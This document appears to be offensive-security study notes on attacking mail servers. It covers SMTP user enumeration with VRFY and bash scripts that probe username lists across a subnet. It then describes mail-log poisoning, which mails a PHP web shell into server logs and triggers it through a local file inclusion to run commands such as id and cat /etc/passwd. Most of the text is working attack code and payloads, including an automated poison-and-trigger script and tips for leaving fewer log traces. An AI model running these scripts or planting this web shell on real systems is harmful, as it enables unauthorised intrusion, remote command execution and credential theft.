nc -nv 10.11.12.8 25
VRFY bob
250 2.1.5 bob@redhat.active.com                   <--- Output if user exists
VRFY idontexist
550 5.1.1 idontexist... User unknown              <--- Output if user does not exist
(252 "Cannot VRFY user" means the server refuses to confirm either way: VRFY is disabled, try RCPT TO instead)
EXPN request: asks the server for the membership of a mailing list (EXPN <listname>); like VRFY it is often disabled
Bash Script for SMTP user enumeration (VRFY)
#!/bin/bash
# VRFY Script: try every username against every SMTP server in 10.11.1.0/24
#############
# numbers.txt: last octet of each target (one per line)
# users.txt:   usernames to test (one per line)
while read -r ip; do            # numbers.txt list of IP's
do
  while read -r user; do        # users.txt list of usernames
    # 250 = user exists, 550 = unknown, 252 = server will not confirm
    echo "VRFY $user" | nc -nv -w 1 "10.11.1.$ip" 25 2>/dev/null | grep '^250'
  done < users.txt
done < numbers.txt
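As an added example (not the original notes' script), the same VRFY loop rewritten so it classifies the reply codes instead of grepping for any 250: the EHLO greeting is also a 250, and a 252 means the server will not confirm either way, so a bare grep both over-reports and misses the "VRFY disabled" case. The 10.11.1.0/24 range, the users.txt/numbers.txt layout, the EHLO name scanner.local and the sample transcript are assumptions/constructed data.

```shell
#!/bin/bash
# Added example: VRFY enumeration with reply-code handling.
# Assumptions: targets are 10.11.1.<octet> from numbers.txt, users come from
# users.txt, EHLO name is "scanner.local"; SAMPLE_REPLIES is a constructed
# server transcript, not real output.

# Classify one server reply line. ESMTP servers tag a successful VRFY with the
# enhanced status code 2.1.5, which separates it from the 250 of EHLO/MAIL/RCPT.
classify_vrfy_reply() {
    case "$1" in
        "250 2.1.5"*) echo exists ;;     # user or alias exists
        550*)         echo unknown ;;    # no such user
        252*)         echo refused ;;    # VRFY disabled: no information either way
        *)            echo other ;;      # banner, EHLO capabilities, QUIT, ...
    esac
}

# Client side of the conversation for the users on stdin, finishing with QUIT
# so the server closes the socket instead of nc sitting until its timeout.
build_vrfy_dialogue() {
    printf 'EHLO %s\r\n' "$1"
    while read -r user; do
        [ -n "$user" ] && printf 'VRFY %s\r\n' "$user"
    done
    printf 'QUIT\r\n'
}

# Count confirmed users in a server transcript read from stdin.
count_existing_users() {
    n=0
    while read -r line; do
        [ "$(classify_vrfy_reply "$line")" = exists ] && n=$((n + 1))
    done
    echo "$n"
}

# Live run against one host. Needs network, so it is only defined here.
vrfy_host() {
    host="$1"; users="$2"
    build_vrfy_dialogue scanner.local < "$users" \
        | nc -nv -w 2 "$host" 25 2>/dev/null \
        | tr -d '\r' \
        | while read -r line; do
            case "$(classify_vrfy_reply "$line")" in
                exists)  echo "$host: $line" ;;
                refused) echo "$host: VRFY refused, try RCPT TO instead" >&2; break ;;
            esac
          done
}

# Constructed transcript (not real server output) to exercise the parser.
SAMPLE_REPLIES='220 mail.example.com ESMTP Sendmail
250 mail.example.com Hello scanner.local
250 2.1.5 bob@redhat.active.com
550 5.1.1 idontexist... User unknown
252 2.5.2 Cannot VRFY user
221 2.0.0 mail.example.com closing connection'

# Usage: for o in $(cat numbers.txt); do vrfy_host "10.11.1.$o" users.txt; done
```

Sending all VRFYs in one connection (instead of one nc per user, as the loop above does) is also far faster and leaves fewer connection entries in the target's mail log.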
telnet 10.10.10.10 25
EHLO sub.somedomain.com
VRFY username@localhost                 <--- confirm the target mailbox exists first
mail from:someself@nodomain.io
rcpt to: username@localhost
data
Subject: Some Subject
                                        <--- blank line separates headers from body
<?php echo system($_REQUEST['cmd']); ?>
.                                       <--- a lone dot on its own line ends the message
Check that the payload really lands in the file you include: the mail log records the envelope (sender and recipient addresses), not the message body, so if the body is not logged include the recipient's mailbox (/var/mail/username or /var/spool/mail/username) instead.
=================================================
After this, on the LFI you have discovered, include the poisoned file and pass the command in the cmd parameter (?cmd= if it is the first parameter, &cmd= if another parameter comes before it):
?cmd=id
&cmd=id
Examples:
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=whoami
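The same poisoning conversation and LFI request scripted, as an added example that is not part of the original notes: it builds the SMTP session non-interactively so it can be piped into nc, and URL-encodes the command before putting it in cmd (a command with spaces or & breaks the query string if pasted raw, as in the examples above). The host 10.10.10.10, the lfi.php path, the "file" and "cmd" parameter names, the mailbox username@localhost and the sender address are assumptions carried over from the notes.

```shell
#!/bin/bash
# Added example: the log-poisoning conversation from the notes as a script,
# plus the LFI request that triggers it. Host, paths, user and the "cmd"
# parameter name are assumptions; nothing touches the network unless
# poison_and_trigger is called.

# Client side of the SMTP session: one recipient, PHP payload in the body.
build_poison_dialogue() {
    target="$1"; payload="$2"
    printf 'EHLO sub.somedomain.com\r\n'
    printf 'MAIL FROM:<someself@nodomain.io>\r\n'
    printf 'RCPT TO:<%s>\r\n' "$target"
    printf 'DATA\r\n'
    printf 'Subject: Some Subject\r\n\r\n'   # blank line separates headers from body
    printf '%s\r\n' "$payload"
    printf '.\r\n'                            # lone dot terminates DATA
    printf 'QUIT\r\n'
}

# Minimal query-string encoding: only the characters that break the cmd
# parameter. '%' goes first so the other escapes are not re-encoded.
urlencode_cmd() {
    printf '%s' "$1" | sed -e 's/%/%25/g' -e 's/ /%20/g' -e 's/&/%26/g' \
                           -e 's/+/%2B/g' -e 's/#/%23/g' -e 's/?/%3F/g'
}

# LFI URL: include the poisoned file, pass the command in cmd.
build_lfi_url() {
    base="$1"; file="$2"; cmd="$3"
    printf '%s?file=%s&cmd=%s\n' "$base" "$file" "$(urlencode_cmd "$cmd")"
}

# Live run (network): send the mail, then fetch the command output.
poison_and_trigger() {
    mailhost="$1"; lfi_base="$2"; logfile="$3"; cmd="$4"
    build_poison_dialogue username@localhost \
        "<?php echo system(\$_REQUEST['cmd']); ?>" \
        | nc -nv -w 3 "$mailhost" 25 >/dev/null 2>&1
    curl -s "$(build_lfi_url "$lfi_base" "$logfile" "$cmd")"
}

# Usage:
# poison_and_trigger 10.10.10.10 http://10.10.10.10/somedir/lfi.php \
#     ../../../../../var/log/mail.log 'cat /etc/passwd'
```

Send the poisoning mail once only: every extra message appends another copy of the PHP tag to the included file, and each include then executes the command that many times.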